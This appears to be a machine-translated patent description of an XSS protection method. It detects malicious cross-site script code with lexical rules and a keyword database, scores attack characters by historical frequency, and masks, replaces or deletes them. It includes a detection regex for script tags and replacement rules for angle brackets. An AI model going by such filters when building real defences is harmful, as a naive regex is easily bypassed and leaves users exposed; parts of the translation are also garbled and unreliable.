本申请提供一种跨站攻击防护设备。This application provides a cross-site attack protection device.
参照图1,图1为本申请实施例方案涉及的跨站攻击防护设备运行环境的结构示意图。Referring to FIG. 1, FIG. 1 is a schematic structural diagram of the operating environment of the cross-site attack protection equipment involved in the solution of the embodiment of the application.
如图1所示,该跨站攻击防护设备包括:处理器101,例如CPU,通信总线102、用户接口103,网络接口104,存储器105。其中,通信总线102 用于实现这些组件之间的连接通信。用户接口103可以包括显示屏(Display)、输入单元比如键盘(Keyboard),网络接口104可选的可以包括标准的有线接口、无线接口(如WI-FI接口)。存储器105可以是高速RAM存储器,也可以是稳定的存储器(non-volatile memory),例如磁盘存储器。存储器105可选的还可以是独立于前述处理器101的存储装置。As shown in FIG. 1, the cross-site attack protection device includes: a processor 101, such as a CPU, a communication bus 102, a user interface 103, a network interface 104, and a memory 105. Among them, the communication bus 102 is used to implement connection and communication between these components. The user interface 103 may include a display screen (Display) and an input unit such as a keyboard (Keyboard), and the network interface 104 may optionally include a standard wired interface and a wireless interface (such as a WI-FI interface). The memory 105 may be a high-speed RAM memory, or a non-volatile memory (non-volatile memory), such as a magnetic disk memory. Optionally, the memory 105 may also be a storage device independent of the aforementioned processor 101.
本领域技术人员可以理解,图1中示出的跨站攻击防护设备的硬件结构并不构成对本申请中的跨站攻击防护设备的限定,可以包括比图示更多或更少的部件,或者组合某些部件,或者不同的部件布置。Those skilled in the art can understand that the hardware structure of the cross-site attack protection device shown in FIG. 1 does not constitute a limitation on the cross-site attack protection device in this application, and may include more or less components than shown in the figure, or Combining certain components, or different component arrangements.
如图1所示,作为一种计算机可读存储介质的存储器105中可以包括操作系统、网络通信模块、用户接口模块以及基于跨站攻击防护程序。其中,操作系统是管理和控制跨站攻击防护设备和软件资源的程序,支持跨站攻击防护程序以及其它软件和/或程序的运行。As shown in FIG. 1, the memory 105 as a computer-readable storage medium may include an operating system, a network communication module, a user interface module, and a cross-site attack-based protection program. Among them, the operating system is a program that manages and controls cross-site attack protection equipment and software resources, and supports the operation of cross-site attack protection programs and other software and/or programs.
在图1所示的跨站攻击防护设备的硬件结构中,网络接口104主要用于接入网络;用户接口103主要用于侦测确认用户终端的扫码操作指令和支付输入的指令等,而处理器101可以用于调用存储器105中存储的跨站攻击防护程序,并执行以下跨站攻击防护方法的各实施例的操作。In the hardware structure of the cross-site attack protection equipment shown in Figure 1, the network interface 104 is mainly used to access the network; the user interface 103 is mainly used to detect and confirm the user terminal’s code scanning operation instructions and payment input instructions, etc. The processor 101 may be used to call a cross-site attack protection program stored in the memory 105, and perform operations in the following embodiments of the cross-site attack protection method.
在本申请实施例中,对于图1的实现还可以是一种移动终端,该移动终端的处理器通过读取存储在缓存器或者存储单元中的可以实现跨站攻击防护方法的程序代码来进行跨站的数据访问。In the embodiment of the present application, the implementation of FIG. 1 may also be a mobile terminal, and the processor of the mobile terminal reads the program code stored in the buffer or the storage unit that can implement the cross-site attack protection method. Cross-site data access.
基于上述跨站攻击防护设备硬件结构,提出本申请跨站攻击防护方法的各个实施例。Based on the foregoing hardware structure of the cross-site attack protection device, various embodiments of the cross-site attack protection method of the present application are proposed.
参照图2,图2为本申请实施例提供的跨站攻击防护方法的流程图。在本实施例中,所述跨站攻击防护方法具体包括以下步骤:Referring to FIG. 2, FIG. 2 is a flowchart of a cross-site attack protection method provided by an embodiment of this application. In this embodiment, the cross-site attack protection method specifically includes the following steps:
步骤S210,获取网络侧接收到的外网访问请求,所述外网访问请求为包含至少一个用于实现跨站数据访问的跨站访问脚本代码的集合;Step S210: Obtain an external network access request received by the network side, where the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
在该步骤中,所述外网访问请求指的是非被访问的网络侧的用户发送的请求,例如某公司中的内部局域网和Internet网的关系。而外网访问请求是由一些脚本代码组成,其可以是一个脚本代码,其脚本代码中包含有多种数据访问方式;其也可以是包含多个脚本代码组成,每个脚本代码对应一种数据的访问。在实际应用中,该外网访问请求中的访问脚本代码也可以理解是一个完成的访问代码,在需要访问时,将代码下载到对应的被访问终端中;也可以是一个触发的脚本代码,也即是说,真正的访问脚本代码是存储在被访 问终端中的,而需要通过请求中的触发代码来控制执行。In this step, the external network access request refers to a request sent by a user on the side of a non-visited network, such as the relationship between an internal local area network and an Internet network in a certain company. The external network access request is composed of some script codes, which can be a script code that contains multiple data access methods; it can also be composed of multiple script codes, and each script code corresponds to a type of data. Access. In actual applications, the access script code in the extranet access request can also be understood as a completed access code. When access is required, the code is downloaded to the corresponding accessed terminal; it can also be a triggered script code. That is to say, the actual access script code is stored in the accessed terminal, and the execution needs to be controlled by the trigger code in the request.
步骤S220,根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序,其中,所述词法组合规则为通过当前已知的恶意攻击程序分析得到的模型;Step S220: According to a predefined lexical combination rule, detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request, where the lexical combination rule is A model obtained through analysis of currently known malicious attack programs;
在该步骤中,所述检测是否存在恶意网页程序的具体原理为先对所述外网访问请求中的跨站访问脚本代码进行聚类分析,其中,具体是分析代码中网页的访问接口,基于接口来初步确定访问程序的词法的组合形式,并对其进行同族的归类,然后根据同一家族的所有访问程序(即是访问代码)做词法组合规则的分析,找出同一家族程序中都调用了哪些危险函数、系统资源、可疑标签、关键类和对象等等,最后根据这些元素的词序来定义词法分析和检测规则,最终确定其访问代码是否属于恶意网页程序。该步骤中的检测方式与传统的IPS规则和WAF规则相比,能有效避免单一特征被绕过,而导致误判恶意程序的问题。In this step, the specific principle of detecting whether there is a malicious webpage program is to first perform a cluster analysis of the cross-site access script code in the extranet access request, where the specific analysis code is the access interface of the webpage based on Interface to preliminarily determine the lexical combination form of the access program, and classify it into the same family, and then analyze the lexical combination rules according to all access programs in the same family (that is, access code), and find out that all programs in the same family are called Which dangerous functions, system resources, suspicious tags, key categories and objects, etc., are finally defined according to the word order of these elements to define lexical analysis and detection rules, and finally determine whether the access code is a malicious webpage program. Compared with the traditional IPS rules and WAF rules, the detection method in this step can effectively prevent a single feature from being bypassed, leading to the problem of misjudgment of malicious programs.
步骤S230,若存在恶意程序,则检测所述跨站访问脚本代码中是否存在访问标识,其中,所述访问标识为基于预置的用户规则定义得到;Step S230, if there is a malicious program, detect whether there is an access identifier in the cross-site access script code, where the access identifier is defined based on a preset user rule;
在该步骤中,所述用户规则定义应当理解为是针对不同网页的访问方式和信息存储方式自定义的一种访问规则,而通过该访问规则来设置一个访问标识,当网页服务器或者用户终端接收到该访问标识后,可以根据预先规定好的对应关系来查询选择与该访问标识相匹配的访问方式来实现对网页的数据访问。In this step, the user rule definition should be understood as an access rule customized for different web access methods and information storage methods, and an access identifier is set through the access rule. When the web server or user terminal receives After the access identifier is reached, it is possible to query and select an access mode matching the access identifier according to the pre-defined corresponding relationship to achieve data access to the webpage.
进一步的,还有一些需要特殊访问的网页设置,例如会采用一些被网络定义为非法访问的代码或者字符来实现特殊访问,但是这些代码或字符被系统设置为可信的访问用语,这时可以通过该访问标识来设置,从而实现对特殊代码或者字符的过滤。Furthermore, there are some webpage settings that require special access. For example, some codes or characters defined as illegal access by the network are used to achieve special access, but these codes or characters are set as trusted access terms by the system. It is set through the access identifier to realize the filtering of special codes or characters.
在本实施例中,通过步骤S20检测到的恶意网页程序可以是初步认定为恶意的结果,而再通过步骤S30标注访问标识的判断,实现了对初步认定结果的精准判断,避免了误认定恶意的现象。In this embodiment, the malicious webpage program detected in step S20 may be the result of preliminary identification as malicious, and then the judgment of marking the access identifier in step S30 realizes the accurate judgment of the preliminary identification result and avoids misidentification of malicious The phenomenon.
步骤S240,若存在所述访问标识,则判断所述跨站访问脚本代码中是否存在具有攻击能力的字符;Step S240, if the access identifier exists, determine whether there are characters with attack capability in the cross-site access script code;
在实际应用中,由于外网访问请求的代码设置都是公开的设置方式,不同的是会通过在代码中添加一些校验参数或者是加密,而这些安全处理方式基本都是大同小异的东西,经常会被破解,从而加入一些恶意的代码来实现对用户信息的获取,对此,本步骤中,通过对外网访问请求进行代码化处理, 这里的代码化处理就是将程序化的请求转换为一个个的访问脚本代码,而转换后的访问脚本代码指的是代码源程序。In practical applications, since the code settings for external network access requests are all public settings, the difference is that some verification parameters or encryption are added to the code, and these security processing methods are basically the same, often It will be cracked, and some malicious code will be added to obtain user information. For this, in this step, the external network access request is coded. The coding process here is to convert the programmatic request into one by one. The access script code is the access script code, and the converted access script code refers to the code source program.
然后,在对源程序进行分解处理,划分出一个个的关键字,而该关键字的划分方式是通过以能实现访问数据为基准进行划分,也即是说划分出来的关键字是可以实现单独的小字节的访问的。Then, after decomposing the source program, the keywords are divided into one by one, and the method of dividing the keywords is based on the data that can be accessed. That is to say, the divided keywords can be separated. The little endian of the visit.
对于判断访问脚本代码中是否存在具有攻击能力的字符,具体是对关键字的检测,可以通过特征库的比对,或者是以网络中对于每个关键字的网络定义来确定;For judging whether there are characters with attack capabilities in the access script code, specifically the detection of keywords, it can be determined by the comparison of the feature library or the network definition of each keyword in the network;
对于通过特征库的比对来判断时,是将划分得到的每个关键字从预先设置好的攻击信息库中查询,若查询到攻击信息库中存在,则根据关键字来筛选出外网访问请求中的带查询到的关键字的脚本代码,然后执行步骤S50进行脚本防御处理。When judging by the comparison of the signature database, each of the divided keywords is queried from the pre-set attack information database. If the attack information database is queried, the external network access requests will be filtered according to the keywords. The script code with the queried keywords in, then execute step S50 for script defense processing.
在实际应用中,对于攻击信息库的建立具体是根据服务器平时测试得到的恶意代码关键字来组成,同时也从网络中获取网络上认定的具有攻击性的关键字来形成,当然还可以根据用户的源代码开发习惯来选择某些不常使用或者比较偏僻的代码字来组成。当检测到这类型的代码字段时,需要特别的注意判断。In practical applications, the establishment of the attack information database is specifically based on the malicious code keywords obtained from the server’s usual tests. At the same time, it is also formed by obtaining the offensive keywords identified on the network from the network. Of course, it can also be formed based on the user The source code development habit is to choose some infrequently used or relatively uncommon code words to form. When this type of code field is detected, special attention and judgment are required.
进一步的,对于以网络中的定义来确定时,是通过对待检测的关键字,从网络上获取其网络的普通定义或者特殊定义,通过定义来确定其是否可以用于进行攻击,在网络上一般都会公布一些攻击代码程序或者是特殊用处的代码程序,通过这些代码也可以进行访问请求是否具有攻击性。Further, when determining by the definition in the network, it is to obtain the general or special definition of the network from the network through the keyword to be detected, and determine whether it can be used for attacking through the definition. Some attack code programs or special-purpose code programs will be published, and access requests can also be made through these codes.
步骤S250,若所述跨站访问脚本代码中存在所述字符,则根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理。Step S250: If the character exists in the cross-site access script code, the characters with attack capability in the cross-site access script code are filtered out according to the access identifier, and the cross-site access script code is cross-referenced. Site script defense processing.
在本实施例中,对于所述跨站脚本防御处理主要是通过对所述具有攻击能力的字符或者其所在的整个跨站访问脚本代码进行屏蔽、删除或者替换处理;而屏蔽指的是将字符通过一些特殊的手段从代码中隐藏起来,从而实现弱化代码的攻击能力,甚至是去除其攻击能力。In this embodiment, the cross-site scripting defense processing is mainly through shielding, deleting, or replacing the characters with attack capability or the entire cross-site access script code in which they are located; and shielding refers to removing characters Hidden from the code by some special means, so as to weaken the attack ability of the code, or even remove its attack ability.
在实际应用中,对于屏蔽、删除和替换的处理方式,具体还需要根据代码的性能来选择,若该代码是具有特殊的功能定义时,这不能使用删除的处理方式,删除通常情况下是是代码失去执行能力,而屏蔽和替换还可以保留代码原来的功能。In actual applications, the specific processing methods for shielding, deletion and replacement need to be selected according to the performance of the code. If the code has a special function definition, the delete processing method cannot be used. The deletion is usually The code loses the ability to execute, and shielding and replacement can retain the original function of the code.
在本实施例中,在设置所述访问标识时,具体可以通过以下方式来实现: 检测所述外网访问请求中携带的用户信息,判断所述用户信息是否为预置的用户规则定义需保护的用户信息;In this embodiment, when the access identifier is set, it can be specifically implemented in the following ways: Detect user information carried in the external network access request, and determine whether the user information is a preset user rule that requires protection User information;
若是,则根据所述用户规则定义的保护策略和访问策略,在所述外网访问请求中增加访问标识,优选的,该访问标识主要是用于对访问方式的定义,也可以是对信息安全的保护定义,通过该访问标识的设置可以同时实现对用户信息的保护,也可以对访问中的特殊字符的设置。If yes, add an access identifier to the external network access request according to the protection policy and access policy defined by the user rule. Preferably, the access identifier is mainly used to define the access method, or it can be for information security The definition of protection, through the setting of the access identifier, the protection of user information can be realized at the same time, and the special characters in the access can also be set.
在本实施例中,对于步骤S240中,根据所述访问标识筛出选所述访问脚本代码中具有攻击能力的字符具体具体可以通过以下方式实现:In this embodiment, in step S240, screening and selecting characters with attack capabilities in the access script code according to the access identifier can be specifically implemented in the following ways:
根据所述访问标识、访问标识与访问规则之间的对应关系,查询出与当前访问标识对应的访问规则,其中,所述访问规则包含有用于实现跨站访问的特殊字符和跨站访问的访问方式;According to the access identifier, the corresponding relationship between the access identifier and the access rule, the access rule corresponding to the current access identifier is queried, where the access rule contains special characters for realizing cross-site access and cross-site access the way;
根据所述特殊字符对所述访问脚本代码中具有攻击能力的字符进行过滤,以实现将不满足所述访问规则的要求的字符从所述访问脚本中剔除,用于后续的跨站脚本防御处理。The characters with attack capabilities in the access script code are filtered according to the special characters, so as to eliminate characters that do not meet the requirements of the access rules from the access script for subsequent cross-site scripting defense processing .
在本实施例中,对于根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序的具体实现过程可以为:In this embodiment, the specific implementation process for detecting whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request according to the predefined lexical combination rule can be for:
根据所述跨站访问脚本代码进行模拟运行,并捕获到的HTTP数据包在运行时每个访问页面上的活跃标签;Perform simulation operation according to the cross-site access script code, and capture the active tag on each access page of the HTTP data packet at runtime;
计算所述活跃标签在所述跨站访问脚本代码中的概率的倒数,并将所述倒数相加求出算术平均值作为所述活跃标签的内嵌JavaScript合理指数;Calculating the reciprocal of the probability of the active tag in the cross-site access script code, and adding the reciprocal to obtain an arithmetic average as the embedded JavaScript reasonable index of the active tag;
根据所述合理指数对所述跨站访问脚本代码进行归类;Classify the cross-site access script code according to the reasonable index;
其中,所述活跃标签是与所述跨站访问脚本代码之间不存在其它活跃标签的标签,所述标签的概率为所述活跃标签内直接出现在所述跨站访问脚本代码上的概率。Wherein, the active tag is a tag without other active tags between the active tag and the cross-site access script code, and the probability of the tag is the probability of the active tag directly appearing on the cross-site access script code.
在本实施例中,根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理的步骤包括:In this embodiment, the steps of screening out characters with attack capabilities in the cross-site access script code according to the access identifier, and performing cross-site scripting defense processing on the cross-site access script code include:
提取所述跨站访问脚本代码中的具有攻击能力的字符;Extracting attack-capable characters in the cross-site access script code;
计算所述字符在所述外网访问请求中出现的概率;Calculating the probability of the character appearing in the external network access request;
比较所述概率与预设的信息泄密的概率等级之间的大小关系;Comparing the magnitude relationship between the probability and the preset probability level of information leakage;
若所述概率大于所述概率等级,则启动访问防护程序对所述访问请求进行跨站脚本防御处理。If the probability is greater than the probability level, the access protection program is activated to perform cross-site scripting defense processing on the access request.
在实际应用中,为了减低误判断的概率,在通过比对确定了代码中的某些关键词是具有攻击性的情况下,还可以对该关键字进行用于实现攻击的概率的计算,根据用于实现攻击的概率来进一步确定是否需要进行处理。In practical applications, in order to reduce the probability of misjudgment, if certain keywords in the code are determined to be offensive through comparison, the keyword can also be used to calculate the probability of an attack. Used to achieve the probability of an attack to further determine whether it needs to be processed.
进一步的,对于计算所述字符在所述外网访问请求中出现的概率包括:Further, calculating the probability that the character appears in the external network access request includes:
调取所述网络侧中出现跨站攻击的所有历史访问记录,并统计所有所述历史访问记录的跨站访问脚本代码的总数量;Retrieve all historical access records of cross-site attacks on the network side, and count the total number of cross-site access script codes of all historical access records;
统计所述字符在所述所有历史访问记录中的出现次数;Counting the number of occurrences of the character in all the historical visit records;
根据所述出现次数和所述总数量计算出所述概率。The probability is calculated based on the number of occurrences and the total number.
在实际应用中,对于攻击的检测,终端或者服务器端一般都会生成一个攻击日志,在日志中存储有终端或者服务器被攻击的所有记录,而该记录中可以是存在关键字,也可以是存在整个脚本代码,通过将初步判断认定具有攻击性的关键词再从历史记录中来计算判断是否可能数据该网络侧的攻击字符,若计算的概率是大于的预先设置的概率上限时,则认定了该字符是属于高危险性的代码字符,则执行步骤S240进行跨站攻击防御XSS。In practical applications, for attack detection, the terminal or server will generally generate an attack log, in which all records of the terminal or server being attacked are stored, and the record can contain keywords or the entire Script code, which calculates and judges whether it is possible to data attack characters on the network side by calculating the keywords that are initially judged to be offensive from the historical records. If the calculated probability is greater than the preset upper limit of probability, the If the character is a high-risk code character, step S240 is executed to defend against XSS by cross-site attack.
在本实施例中,所述根据所述出现次数和所述总数量计算出所述概率包括:In this embodiment, the calculating the probability according to the number of occurrences and the total number includes:
将所述出现次数除以所述总数量,得到一个百分比值;Divide the number of occurrences by the total number to obtain a percentage value;
将所述百分比值乘以一个权重系数,得到最终的概率,其计算公式如下:Multiply the percentage value by a weighting coefficient to get the final probability. The calculation formula is as follows:
Figure PCTCN2019119113-appb-000002
Figure PCTCN2019119113-appb-000002
其中,P为具有攻击能力的字符出现的概率,m为所述出现次数,M为所述跨站访问脚本代码的总数量,α为权重系数。Where, P is the probability of occurrence of characters with attack capability, m is the number of occurrences, M is the total number of cross-site access script codes, and α is the weight coefficient.
在本实施例中,通过上述的方式得到了最终的概率后,还需要对概率进行危险等级的判断,根据实际情况,一般将概率等级根据攻击程度从低到设置为三个等级,所述对所述跨站访问脚本代码进行跨站脚本防御处理包括:In this embodiment, after the final probability is obtained by the above-mentioned method, it is also necessary to judge the risk level of the probability. According to the actual situation, the probability level is generally set from low to three levels according to the degree of attack. The cross-site scripting code for cross-site scripting defense processing includes:
若所述概率大于第一概率等级且小于第二概率等级,则对所述跨站访问脚本代码中对应的字符或者整个代码进行屏蔽处理;If the probability is greater than the first probability level and less than the second probability level, perform shielding processing on the corresponding character or the entire code in the cross-site access script code;
若所述概率大于第二概率等级且小于第三概率等级,则对所述跨站访问脚本代码中的字符或者整个代码进行替换处理;If the probability is greater than the second probability level and less than the third probability level, replace the characters or the entire code in the cross-site access script code;
若所述概率大于第三概率等级,则将所述跨站访问脚本代码从所述外网访问请求中删除。If the probability is greater than the third probability level, the cross-site access script code is deleted from the external network access request.
在实际应用中,根据不同的攻击程度选择不同的防御处理方式,例如,在替换的处理方式中,在替换时,可以按照以下例子进行替换,XSS攻击信 息库中包含1,2,3三种XSS攻击信息的描述特征,若外网访问请求中包含“<”,则根据特征的替换定义将“<”替换成空格;若外网访问请求中包含“>”,则根据特征的替换定义将“>”替换成空格;若外网访问请求中包含符合正则表达式<\s*script\sW.*<\s*/\s*script\s*>的内容字符串,则根据特征的替换定义,采用自定义方式替换为“com.pingan.xxxx”。In practical applications, different defense processing methods are selected according to different attack levels. For example, in the replacement processing method, when replacing, you can replace it according to the following example. The XSS attack information database contains 1, 2, and 3. The descriptive characteristics of XSS attack information. If the extranet access request contains "<", then the "<" will be replaced with a space according to the replacement definition of the feature; if the extranet access request contains ">", the replacement definition of the feature will be changed ">" is replaced with a space; if the external network access request contains a content string conforming to the regular expression <\s*script\sW.*<\s*/\s*script\s*>, it will be replaced according to the characteristics Definition, replace it with "com.pingan.xxxx" in a custom way.
在本实施例中,而根据上述的三个等级进行区分恶意攻击的等级,但是在实际应用中,并不是所有的脚本代码都可以进行直接删除处理,对于在跨站访问中必须的脚本代码就不可以通过删除的方式或者转义的方式来进行防护,对于恶意攻击等级较高的脚本代码具体可以通过以下方式来实现:In this embodiment, the malicious attack levels are distinguished according to the above three levels. However, in actual applications, not all script codes can be directly deleted. For the script codes necessary for cross-site access It cannot be protected by deleting or escaping. For script code with a higher level of malicious attack, it can be implemented in the following ways:
当比较的结果是所述概率大于第三概率等级时,则可以启动脚本访问功能的检测来选择比较安全的防护方式来实现,其实现过程具体如下:When the result of the comparison is that the probability is greater than the third probability level, the detection of the script access function can be started to select a safer protection method to achieve it. The implementation process is as follows:
对所述跨站访问脚本代码进行功能性评估,确定所述跨站访问脚本代码在所述外网访问请求中是否为必须的功能访问代码;Perform functional evaluation on the cross-site access script code, and determine whether the cross-site access script code is a necessary function access code in the external network access request;
若是,则保留所述跨站访问脚本代码在所述外网访问请求中,并将所述具有攻击能力的字符替换为预设的安全字符,所述安全字符为仅实现代码位数填充作用的符号。If yes, keep the cross-site access script code in the extranet access request, and replace the attack-capable character with a preset security character, the security character only realizes the code digit filling function symbol.
进一步的,对所述具有攻击能力的字符或者其所在的整个跨站访问脚本代码进行替换处理包括:Further, replacing the character with attack capability or the entire cross-site access script code in which it is located includes:
对所述字符中的关键字进行替换,或者将所述字符中的关键字通过中文字符转换规则转换为空白的中文字符,使该字符失去攻击能力。The keywords in the characters are replaced, or the keywords in the characters are converted into blank Chinese characters through Chinese character conversion rules, so that the characters lose the ability to attack.
在实际应用中,对于攻击代码一般很少是直接植入完整的脚本了,而是在外网访问请求的原本脚本中插入一个字符或者一段脚本即可实现,对于这种情况,在检测出来后,直接删除或者屏蔽即可;但是对于篡改原本脚本的情况下,则需要进行替换保证外网访问请求的失效,当前为了保证安全,也可以直接忽略这个请求,并返回重新发送请求的消息,重新获取一个请求。In practical applications, it is generally rare to directly implant a complete script for the attack code, but insert a character or a script into the original script of the external network access request. In this case, after detection, Just delete or block it directly; but in the case of tampering with the original script, you need to replace it to ensure the invalidation of the external network access request. To ensure security, you can also ignore this request directly, and return the message to resend the request, and get it again a request.
进一步的,对于该请求具有特殊功能的情况下,或者是不具有重复性的请求时,可以通过替换的方式来保证请求的正常执行,同时还去除了跨站攻击的能力。Further, when the request has a special function, or when it is a non-repetitive request, replacement can be used to ensure the normal execution of the request, and at the same time, the ability for cross-site attacks is removed.
通过上述提供的方法实现跨站访问,实现了对外网访问请求中恶意脚本的攻击检测,并对恶意的代码字符进行屏蔽或者替换,使其失去攻击能力,保证了访问的安全度和信息的安全性。Cross-site access is achieved through the above-provided method, which realizes the attack detection of malicious scripts in external network access requests, and shields or replaces malicious code characters to disable attack capabilities, ensuring the security of access and information security Sex.
对于跨站访问的攻击一般都是在基站一侧进行,而攻击人员通过对基站 的监控进行劫获用户发送的访问数据,然后通过修改访问数据中的部分代码或者是增加一些函数来实现恶意的攻击,对于本实施例基于基站为基础提出了该跨站攻击防护方法,具体实现过程如下图3所示:Attacks on cross-site access are generally carried out on the side of the base station, and the attacker intercepts the access data sent by the user by monitoring the base station, and then modifies part of the code in the access data or adds some functions to achieve malicious For attacks, this embodiment proposes the cross-site attack protection method based on the base station. The specific implementation process is shown in Figure 3 below:
步骤S310,基站在接收用户通过终端发送过来的跨站访问请求;Step S310, the base station is receiving the cross-site access request sent by the user through the terminal;
在该步骤中,对于跨站访问请求中是携带有基站与用户终端通过握手协议或者加密通信协议预先协商好的规则设置的标识信息,而该标识信息的设置规则可以是一种校验值的算法,即是说基于用户所构建的访问脚本代码会自动生成一个校验值,而该校验值的计算对象是脚本代码的代码本身,当其中的代码发生了变化后,其校验值自然就会产生改变,并且会在跨站访问请求中通过标识信息的方式体现出来。In this step, the cross-site access request carries identification information pre-negotiated by the base station and the user terminal through a handshake protocol or an encrypted communication protocol, and the setting rule for the identification information may be a check value. Algorithm, that is, a check value is automatically generated based on the access script code constructed by the user, and the calculation object of the check value is the code of the script code itself. When the code changes, the check value is natural Changes will occur, and will be reflected in the cross-site access request through identification information.
步骤S320,基站对跨站访问请求进行标识信息的识别;Step S320, the base station recognizes the identification information of the cross-site access request;
在本实施例中,若识别到,则证明该跨站访问请求中的脚本代码被修改过,反之,则没有。In this embodiment, if it is identified, it is proved that the script code in the cross-site access request has been modified, otherwise, it is not.
步骤S330,获取词法组合规则,对跨站访问请求中的跨站访问脚本代码进行代码的词组进行检测;Step S330: Obtain lexical combination rules, and perform code phrase detection on the cross-site access script code in the cross-site access request;
在该步骤中,对于该词法组合规则主要是针对于脚本代码中的函数和小程序之间的组合方式进行检测,而若存在被修改的话,其脚本代码中的函数或者小程序必定是发生变化,而该词法组合规则是相当于二次恶意的检测,从而保证了恶意攻击检测的准确性。In this step, the lexical combination rule is mainly to detect the combination between the function in the script code and the applet, and if it is modified, the function or applet in the script code must be changed. , And the lexical combination rule is equivalent to secondary malicious detection, thus ensuring the accuracy of malicious attack detection.
步骤S340,提取跨站访问脚本代码中的攻击字符;Step S340, extracting attack characters in the cross-site access script code;
在本实施例中,上述攻击字符可以理解为是一种代码函数或者是小程序,也可以是一些代码字节等等。In this embodiment, the above attack character can be understood as a code function or a small program, or some code bytes, etc.
在本实施例中,若在步骤S320和步骤S330中,只检测到标识信息或者是脚本代码组合方式不正确,则执行步骤S350,反之则执行步骤S360。In this embodiment, if in step S320 and step S330, only the identification information is detected or the script code combination method is incorrect, step S350 is executed, otherwise, step S360 is executed.
步骤S350,计算攻击字符的攻击等级;Step S350, calculating the attack level of the attacking character;
步骤S360,评估所述跨站访问脚本代码的功能等级;Step S360, evaluating the function level of the cross-site access script code;
步骤S370,对所述跨站访问脚本代码进行防护处理。Step S370: Perform protection processing on the cross-site access script code.
在该步骤中,对于攻击等级的计算具体可以通过计算字符的概率来计算,具体为:In this step, the calculation of the attack level can be specifically calculated by calculating the probability of the character, specifically:
调取所述网络侧中出现跨站攻击的所有历史访问记录,并统计所有所述历史访问记录的跨站访问脚本代码的总数量;Retrieve all historical access records of cross-site attacks on the network side, and count the total number of cross-site access script codes of all historical access records;
统计所述字符在所述所有历史访问记录中的出现次数;Counting the number of occurrences of the character in all the historical visit records;
将所述出现次数除以所述总数量,得到一个百分比值;Divide the number of occurrences by the total number to obtain a percentage value;
将所述百分比值乘以一个权重系数,得到最终的概率,其计算公式如下:Multiply the percentage value by a weighting coefficient to get the final probability. The calculation formula is as follows:
Figure PCTCN2019119113-appb-000003
Figure PCTCN2019119113-appb-000003
其中,P为具有攻击能力的字符出现的概率,m为所述出现次数,M为所述跨站访问脚本代码的总数量,α为权重系数;Wherein, P is the probability of occurrence of characters with attack ability, m is the number of occurrences, M is the total number of cross-site access script codes, and α is the weight coefficient;
比较字符的概率与攻击等级的该预设概率的大小关系;The relationship between the probability of comparing characters and the preset probability of attack level;
若所述概率大于第一概率等级且小于第二概率等级,则对所述跨站访问脚本代码中对应的字符或者整个代码进行屏蔽处理;If the probability is greater than the first probability level and less than the second probability level, perform shielding processing on the corresponding character or the entire code in the cross-site access script code;
若所述概率大于第二概率等级且小于第三概率等级,则对所述跨站访问脚本代码中的字符或者整个代码进行替换处理;If the probability is greater than the second probability level and less than the third probability level, replace the characters or the entire code in the cross-site access script code;
若所述概率大于第三概率等级,则将所述跨站访问脚本代码从所述外网访问请求中删除。If the probability is greater than the third probability level, the cross-site access script code is deleted from the external network access request.
在本实施例中,对所述跨站访问脚本代码进行功能性评估,确定所述跨站访问脚本代码在所述外网访问请求中是否为必须的功能访问代码;In this embodiment, the functional evaluation of the cross-site access script code is performed to determine whether the cross-site access script code is a necessary function access code in the external network access request;
若是,则保留所述跨站访问脚本代码在所述外网访问请求中,并将所述具有攻击能力的字符替换为预设的安全字符,所述安全字符为仅实现代码位数填充作用的符号。If yes, keep the cross-site access script code in the extranet access request, and replace the attack-capable character with a preset security character, the security character only realizes the code digit filling function symbol.
为了解决上述的问题,本申请实施例还提供了一种跨站攻击防护装置,参照图4,图4为本申请实施例提供的跨站攻击防护装置的功能模块的示意图。在本实施例中,该装置包括:In order to solve the above-mentioned problems, an embodiment of the present application also provides a cross-site attack protection device. Refer to FIG. 4, which is a schematic diagram of functional modules of the cross-site attack protection device provided by an embodiment of the application. In this embodiment, the device includes:
获取模块41,用于获取网络侧接收到的外网访问请求,所述外网访问请求为包含至少一个用于实现跨站数据访问的跨站访问脚本代码的集合;The obtaining module 41 is configured to obtain an external network access request received by the network side, where the external network access request is a collection containing at least one cross-site access script code for implementing cross-site data access;
检测模块42,用于根据预定义的词法组合规则,检测所述外网访问请求携带的跨站访问脚本代码中用于响应跨站访问的HTTP数据包中是否存在恶意程序,其中,所述词法组合规则为通过当前已知的恶意攻击程序分析得到的模型;以及用于检测所述跨站访问脚本代码中是否存在访问标识,其中,所述访问标识为基于预置的用户规则定义得到;The detection module 42 is configured to detect whether there is a malicious program in the HTTP data packet used to respond to the cross-site access in the cross-site access script code carried in the external network access request according to the predefined lexical combination rule, wherein the lexical method The combination rule is a model obtained through analysis of currently known malicious attack programs; and is used to detect whether there is an access identifier in the cross-site access script code, wherein the access identifier is defined based on a preset user rule;
判断模块43,用于若存在所述访问标识,则判断所述跨站访问脚本代码中是否存在具有攻击能力的字符;The judging module 43 is configured to judge whether there are characters with attacking ability in the cross-site access script code if the access identifier exists;
防御处理模块44,用于若所述跨站访问脚本代码中存在所述字符,则根据所述访问标识筛选出所述跨站访问脚本代码中具有攻击能力的字符,并对所述跨站访问脚本代码进行跨站脚本防御处理。The defense processing module 44 is configured to, if the character exists in the cross-site access script code, filter out characters with attack capabilities in the cross-site access script code according to the access identifier, and perform access to the cross-site access The script code performs cross-site scripting defense processing.
基于与上述本申请实施例的跨站攻击防护方法相同的实施例说明内容, 因此本实施例对跨站攻击防护装置的实施例内容不做过多赘述。Based on the description content of the same embodiment as the cross-site attack protection method in the embodiment of the present application, the content of the embodiment of the cross-site attack protection device in this embodiment will not be repeated.
